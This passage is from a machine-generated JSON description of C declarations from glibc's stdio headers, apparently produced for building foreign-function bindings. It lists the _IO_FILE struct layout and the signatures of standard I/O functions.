"/usr/include/x86_64-linux-gnu/bits/types/struct_FILE.h:38:8", "bit-size": 0, "bit-alignment": 0, "fields": [] }, { "tag": "typedef", "ns": 0, "name": "_IO_lock_t", "location": "/usr/include/x86_64-linux-gnu/bits/types/struct_FILE.h:43:14", "type": { "tag": ":void" } }, { "tag": "struct", "ns": 0, "name": "_IO_FILE", "id": 0, "location": "/usr/include/x86_64-linux-gnu/bits/types/struct_FILE.h:49:8", "bit-size": 1728, "bit-alignment": 64, "fields": [{ "tag": "field", "name": "_flags", "bit-offset": 0, "bit-size": 32, "bit-alignment": 32, "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "field", "name": "_IO_read_ptr", "bit-offset": 64, "bit-size": 64, "bit-alignment": 64, "type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } } }, { "tag": "field", "name": "_IO_read_end", "bit-offset": 128, "bit-size": 64, "bit-alignment": 64, "type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } } }, { "tag": "field", "name": "_IO_read_base", "bit-offset": 192, "bit-size": 64, "bit-alignment": 64, "type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } } }, { "tag": "field", "name": "_IO_write_base", "bit-offset": 256, "bit-size": 64, "bit-alignment": 64, "type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } } }, { "tag": "field", "name": "_IO_write_ptr", "bit-offset": 320, "bit-size": 64, "bit-alignment": 64, "type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } } }, { "tag": "field", "name": "_IO_write_end", "bit-offset": 384, "bit-size": 64, "bit-alignment": 64, "type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } } }, { "tag": "field", "name": "_IO_buf_base", "bit-offset": 448, "bit-size": 64, "bit-alignment": 64, "type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } } }, { "tag": "field", "name": "_IO_buf_end", "bit-offset": 512, "bit-size": 64, "bit-alignment": 64, "type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } } }, { "tag": "field", "name": "_IO_save_base", "bit-offset": 576, "bit-size": 64, "bit-alignment": 64, "type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } } }, { "tag": "field", "name": "_IO_backup_base", "bit-offset": 640, "bit-size": 64, "bit-alignment": 64, "type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } } }, { "tag": "field", "name": "_IO_save_end", "bit-offset": 704, "bit-size": 64, "bit-alignment": 64, "type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } } }, { "tag": "field", "name": "_markers", "bit-offset": 768, "bit-size": 64, "bit-alignment": 64, "type": { "tag": ":pointer", "type": { "tag": "struct", "ns": 0, "name": "_IO_marker", "id": 0, "location": "/usr/include/x86_64-linux-gnu/bits/types/struct_FILE.h:36:8", "bit-size": 0, "bit-alignment": 0, "fields": [] } } }, { "tag": "field", "name": "_chain", "bit-offset": 832, "bit-size": 64, "bit-alignment": 64, "type": { "tag": ":pointer", "type": { "tag": ":struct", "name": "_IO_FILE", "id": 8 } } }, { "tag": "field", "name": "_fileno", "bit-offset": 896, "bit-size": 32, "bit-alignment": 32, "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "field", "name": "_flags2", "bit-offset": 928, "bit-size": 32, "bit-alignment": 32, "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "field", "name": "_old_offset", "bit-offset": 960, "bit-size": 64, "bit-alignment": 64, "type": { "tag": "__off_t" } }, { "tag": "field", "name": "_cur_column", "bit-offset": 1024, "bit-size": 16, "bit-alignment": 16, "type": { "tag": ":unsigned-short", "bit-size": 16, "bit-alignment": 16 } }, { "tag": "field", "name": "_vtable_offset", "bit-offset": 1040, "bit-size": 8, "bit-alignment": 8, "type": { "tag": ":signed-char", "bit-size": 8, "bit-alignment": 8 } }, { "tag": "field", "name": "_shortbuf", "bit-offset": 1048, "bit-size": 8, "bit-alignment": 8, "type": { "tag": ":array", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 }, "size": 1 } }, { "tag": "field", "name": "_lock", "bit-offset": 1088, "bit-size": 64, "bit-alignment": 64, "type": { "tag": ":pointer", "type": { "tag": ":void" } } }, { "tag": "field", "name": "_offset", "bit-offset": 1152, "bit-size": 64, "bit-alignment": 64, "type": { "tag": "__off64_t" } }, { "tag": "field", "name": "_codecvt", "bit-offset": 1216, "bit-size": 64, "bit-alignment": 64, "type": { "tag": ":pointer", "type": { "tag": "struct", "ns": 0, "name": "_IO_codecvt", "id": 0, "location": "/usr/include/x86_64-linux-gnu/bits/types/struct_FILE.h:37:8", "bit-size": 0, "bit-alignment": 0, "fields": [] } } }, { "tag": "field", "name": "_wide_data", "bit-offset": 1280, "bit-size": 64, "bit-alignment": 64, "type": { "tag": ":pointer", "type": { "tag": "struct", "ns": 0, "name": "_IO_wide_data", "id": 0, "location": "/usr/include/x86_64-linux-gnu/bits/types/struct_FILE.h:38:8", "bit-size": 0, "bit-alignment": 0, "fields": [] } } }, { "tag": "field", "name": "_freeres_list", "bit-offset": 1344, "bit-size": 64, "bit-alignment": 64, "type": { "tag": ":pointer", "type": { "tag": ":struct", "name": "_IO_FILE", "id": 8 } } }, { "tag": "field", "name": "_freeres_buf", "bit-offset": 1408, "bit-size": 64, "bit-alignment": 64, "type": { "tag": ":pointer", "type": { "tag": ":void" } } }, { "tag": "field", "name": "__pad5", "bit-offset": 1472, "bit-size": 64, "bit-alignment": 64, "type": { "tag": "size_t" } }, { "tag": "field", "name": "_mode", "bit-offset": 1536, "bit-size": 32, "bit-alignment": 32, "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "field", "name": "_unused2", "bit-offset": 1568, "bit-size": 160, "bit-alignment": 8, "type": { "tag": ":array", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 }, "size": 20 } }] }, { "tag": "typedef", "ns": 0, "name": "va_list", "location": "/usr/include/stdio.h:52:24", "type": { "tag": "__gnuc_va_list" } }, { "tag": "typedef", "ns": 0, "name": "off_t", "location": "/usr/include/stdio.h:63:17", "type": { "tag": "__off_t" } }, { "tag": "typedef", "ns": 0, "name": "ssize_t", "location": "/usr/include/stdio.h:77:19", "type": { "tag": "__ssize_t" } }, { "tag": "typedef", "ns": 0, "name": "fpos_t", "location": "/usr/include/stdio.h:84:18", "type": { "tag": "__fpos_t" } }, { "tag": "extern", "name": "stdin", "ns": 0, "location": "/usr/include/stdio.h:137:14", "type": { "tag": ":pointer", "type": { "tag": "FILE" } } }, { "tag": "extern", "name": "stdout", "ns": 0, "location": "/usr/include/stdio.h:138:14", "type": { "tag": ":pointer", "type": { "tag": "FILE" } } }, { "tag": "extern", "name": "stderr", "ns": 0, "location": "/usr/include/stdio.h:139:14", "type": { "tag": ":pointer", "type": { "tag": "FILE" } } }, { "tag": "function", "name": "remove", "ns": 0, "location": "/usr/include/stdio.h:146:12", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__filename", "type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } } }], "return-type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "rename", "ns": 0, "location": "/usr/include/stdio.h:148:12", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__old", "type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } } }, { "tag": "parameter", "name": "__new", "type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } } }], "return-type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "renameat", "ns": 0, "location": "/usr/include/stdio.h:152:12", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__oldfd", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "parameter", "name": "__old", "type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } } }, { "tag": "parameter", "name": "__newfd", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "parameter", "name": "__new", "type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } } }], "return-type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "tmpfile", "ns": 0, "location": "/usr/include/stdio.h:173:14", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [], "return-type": { "tag": ":pointer", "type": { "tag": "FILE" } } }, { "tag": "function", "name": "tmpnam", "ns": 0, "location": "/usr/include/stdio.h:187:14", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__s", "type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } } }], "return-type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } } }, { "tag": "function", "name": "tmpnam_r", "ns": 0, "location": "/usr/include/stdio.h:192:14", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__s", "type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } } }], "return-type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } } }, { "tag": "function", "name": "tempnam", "ns": 0, "location": "/usr/include/stdio.h:204:14", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__dir", "type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } } }, { "tag": "parameter", "name": "__pfx", "type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } } }], "return-type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } } }, { "tag": "function", "name": "fclose", "ns": 0, "location": "/usr/include/stdio.h:213:12", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__stream", "type": { "tag": ":pointer", "type": { "tag": "FILE" } } }], "return-type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "fflush", "ns": 0, "location": "/usr/include/stdio.h:218:12", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__stream", "type": { "tag": ":pointer", "type": { "tag": "FILE" } } }], "return-type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "fflush_unlocked", "ns": 0, "location": "/usr/include/stdio.h:227:12", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__stream", "type": { "tag": ":pointer", "type": { "tag": "FILE" } } }], "return-type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "fopen", "ns": 0, "location": "/usr/include/stdio.h:246:14", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__filename", "type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } } }, { "tag": "parameter", "name": "__modes", "type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } } }], "return-type": { "tag": ":pointer", "type": { "tag": "FILE" } } }, { "tag": "function", "name": "freopen", "ns": 0, "location": "/usr/include/stdio.h:252:14", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__filename", "type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } } }, { "tag": "parameter", "name": "__modes", "type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } } }, { "tag": "parameter", "name": "__stream", "type": { "tag": ":pointer", "type": { "tag": "FILE" } } }], "return-type": { "tag": ":pointer", "type": { "tag": "FILE" } } }, { "tag": "function", "name": "fdopen", "ns": 0, "location": "/usr/include/stdio.h:279:14", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__fd", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "parameter", "name": "__modes", "type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } } }], "return-type": { "tag": ":pointer", "type": { "tag": "FILE" } } }, { "tag": "function", "name": "fmemopen", "ns": 0, "location": "/usr/include/stdio.h:292:14", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__s", "type": { "tag": ":pointer", "type": { "tag": ":void" } } }, { "tag": "parameter", "name": "__len", "type": { "tag": "size_t" } }, { "tag": "parameter", "name": "__modes", "type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } } }], "return-type": { "tag": ":pointer", "type": { "tag": "FILE" } } }, { "tag": "function", "name": "open_memstream", "ns": 0, "location": "/usr/include/stdio.h:298:14", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__bufloc", "type": { "tag": ":pointer", "type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } } } }, { "tag": "parameter", "name": "__sizeloc", "type": { "tag": ":pointer", "type": { "tag": "size_t" } } }], "return-type": { "tag": ":pointer", "type": { "tag": "FILE" } } }, { "tag": "function", "name": "setbuf", "ns": 0, "location": "/usr/include/stdio.h:304:13", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__stream", "type": { "tag": ":pointer", "type": { "tag": "FILE" } } }, { "tag": "parameter", "name": "__buf", "type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } } }], "return-type": { "tag": ":void" } }, { "tag": "function", "name": "setvbuf", "ns": 0, "location": "/usr/include/stdio.h:308:12", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__stream", "type": { "tag": ":pointer", "type": { "tag": "FILE" } } }, { "tag": "parameter", "name": "__buf", "type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } } }, { "tag": "parameter", "name": "__modes", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "parameter", "name": "__n", "type": { "tag": "size_t" } }], "return-type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "setbuffer", "ns": 0, "location": "/usr/include/stdio.h:314:13", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__stream", "type": { "tag": ":pointer", "type": { "tag": "FILE" } } }, { "tag": "parameter", "name": "__buf", "type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } } }, { "tag": "parameter", "name": "__size", "type": { "tag": "size_t" } }], "return-type": { "tag": ":void" } }, { "tag": "function", "name": "setlinebuf", "ns": 0, "location": "/usr/include/stdio.h:318:13", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__stream", "type": { "tag": ":pointer", "type": { "tag": "FILE" } } }], "return-type": { "tag": ":void" } }, { "tag": "function", "name": "fprintf", "ns": 0, "location": "/usr/include/stdio.h:326:12", "variadic": true, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__stream", "type": { "tag": ":pointer", "type": { "tag": "FILE" } } }, { "tag": "parameter", "name": "__format", "type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } } }], "return-type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "printf", "ns": 0, "location": "/usr/include/stdio.h:332:12", "variadic": true, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__format", "type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } } }], "return-type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "sprintf", "ns": 0, "location": "/usr/include/stdio.h:334:12", "variadic": true, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__s", "type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } } }, { "tag": "parameter", "name": "__format", "type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } } }], "return-type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "vfprintf", "ns": 0, "location": "/usr/include/stdio.h:341:12", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__s", "type": { "tag": ":pointer", "type": { "tag": "FILE" } } }, { "tag": "parameter", "name": "__format", "type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } } }, { "tag": "parameter", "name": "__arg", "type": { "tag": "__gnuc_va_list" } }], "return-type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "vprintf", "ns": 0, "location": "/usr/include/stdio.h:347:12", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__format", "type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } } }, { "tag": "parameter", "name": "__arg", "type": { "tag": "__gnuc_va_list" } }], "return-type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "vsprintf", "ns": 0, "location": "/usr/include/stdio.h:349:12", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__s", "type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } } }, { "tag": "parameter", "name": "__format", "type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } } }, { "tag": "parameter", "name": "__arg", "type": { "tag": "__gnuc_va_list" } }], "return-type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "snprintf", "ns": 0, "location": "/usr/include/stdio.h:354:12", "variadic": true, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__s", "type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } } }, { "tag": "parameter", "name": "__maxlen", "type": { "tag": "size_t" } }, { "tag": "parameter", "name": "__format", "type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } } }], "return-type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "vsnprintf", "ns": 0, "location": "/usr/include/stdio.h:358:12", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__s", "type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } } }, { "tag": "parameter", "name": "__maxlen", "type": { "tag": "size_t" } }, { "tag": "parameter", "name": "__format", "type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } } }, { "tag": "parameter", "name": "__arg", "type": { "tag": "__gnuc_va_list" } }], "return-type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "vdprintf", "ns": 0, "location": "/usr/include/stdio.h:379:12", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__fd", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "parameter", "name": "__fmt", "type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } } }, { "tag": "parameter", "name": "__arg", "type": { "tag": "__gnuc_va_list" } }], "return-type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "dprintf", "ns": 0, "location": "/usr/include/stdio.h:382:12", "variadic": true, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__fd", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "parameter", "name": "__fmt", "type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } } }], "return-type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "fscanf", "ns": 0, "location": "/usr/include/stdio.h:391:12", "variadic": true, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__stream", "type": { "tag": ":pointer", "type": { "tag": "FILE" } } }, { "tag": "parameter", "name": "__format", "type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } } }], "return-type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "scanf", "ns": 0, "location": "/usr/include/stdio.h:397:12", "variadic": true, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__format", "type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } } }], "return-type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "sscanf", "ns": 0, "location": "/usr/include/stdio.h:399:12", "variadic": true, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__s", "type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } } }, { "tag": "parameter", "name": "__format", "type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } } }], "return-type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "fscanf", "ns": 0, "location": "/usr/include/stdio.h:407:12 <Spelling=/usr/include/stdio.h:407:24>", "variadic": true, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__stream", "type": { "tag": ":pointer", "type": { "tag": "FILE" } } }, { "tag": "parameter", "name": "__format", "type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } } }], "return-type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "scanf", "ns": 0, "location": "/usr/include/stdio.h:410:12 <Spelling=/usr/include/stdio.h:410:24>", "variadic": true, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__format", "type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } } }], "return-type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "sscanf", "ns": 0, "location": "/usr/include/stdio.h:412:12 <Spelling=/usr/include/stdio.h:412:28>", "variadic": true, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__s", "type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } } }, { "tag": "parameter", "name": "__format", "type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } } }], "return-type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "vfscanf", "ns": 0, "location": "/usr/include/stdio.h:432:12", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__s", "type": { "tag": ":pointer", "type": { "tag": "FILE" } } }, { "tag": "parameter", "name": "__format", "type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } } }, { "tag": "parameter", "name": "__arg", "type": { "tag": "__gnuc_va_list" } }], "return-type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "vscanf", "ns": 0, "location": "/usr/include/stdio.h:440:12", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__format", "type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } } }, { "tag": "parameter", "name": "__arg", "type": { "tag": "__gnuc_va_list" } }], "return-type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "vsscanf", "ns": 0, "location": "/usr/include/stdio.h:444:12", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__s", "type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } } }, { "tag": "parameter", "name": "__format", "type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } } }, { "tag": "parameter", "name": "__arg", "type": { "tag": "__gnuc_va_list" } }], "return-type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "vfscanf", "ns": 0, "location": "/usr/include/stdio.h:451:12 <Spelling=/usr/include/stdio.h:451:24>", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__s", "type": { "tag": ":pointer", "type": { "tag": "FILE" } } }, { "tag": "parameter", "name": "__format", "type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } } }, { "tag": "parameter", "name": "__arg", "type": { "tag": "__gnuc_va_list" } }], "return-type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "vscanf", "ns": 0, "location": "/usr/include/stdio.h:456:12 <Spelling=/usr/include/stdio.h:456:24>", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__format", "type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } } }, { "tag": "parameter", "name": "__arg", "type": { "tag": "__gnuc_va_list" } }], "return-type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "vsscanf", "ns": 0, "location": "/usr/include/stdio.h:459:12 <Spelling=/usr/include/stdio.h:459:28>", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__s", "type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } } }, { "tag": "parameter", "name": "__format", "type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } } }, { "tag": "parameter", "name": "__arg", "type": { "tag": "__gnuc_va_list" } }], "return-type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "fgetc", "ns": 0, "location": "/usr/include/stdio.h:485:12", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__stream", "type": { "tag": ":pointer", "type": { "tag": "FILE" } } }], "return-type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "getc", "ns": 0, "location": "/usr/include/stdio.h:486:12", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__stream", "type": { "tag": ":pointer", "type": { "tag": "FILE" } } }], "return-type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "getchar", "ns": 0, "location": "/usr/include/stdio.h:492:12", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [], "return-type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "getc_unlocked", "ns": 0, "location": "/usr/include/stdio.h:499:12", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__stream", "type": { "tag": ":pointer", "type": { "tag": "FILE" } } }], "return-type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "getchar_unlocked", "ns": 0, "location": "/usr/include/stdio.h:500:12", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [], "return-type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "fgetc_unlocked", "ns": 0, "location": "/usr/include/stdio.h:510:12", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__stream", "type": { "tag": ":pointer", "type": { "tag": "FILE" } } }], "return-type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "fputc", "ns": 0, "location": "/usr/include/stdio.h:521:12", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__c", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "parameter", "name": "__stream", "type": { "tag": ":pointer", "type": { "tag": "FILE" } } }], "return-type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "putc", "ns": 0, "location": "/usr/include/stdio.h:522:12", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__c", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "parameter", "name": "__stream", "type": { "tag": ":pointer", "type": { "tag": "FILE" } } }], "return-type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "putchar", "ns": 0, "location": "/usr/include/stdio.h:528:12", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__c", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }], "return-type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "fputc_unlocked", "ns": 0, "location": "/usr/include/stdio.h:537:12", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__c", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "parameter", "name": "__stream", "type": { "tag": ":pointer", "type": { "tag": "FILE" } } }], "return-type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "putc_unlocked", 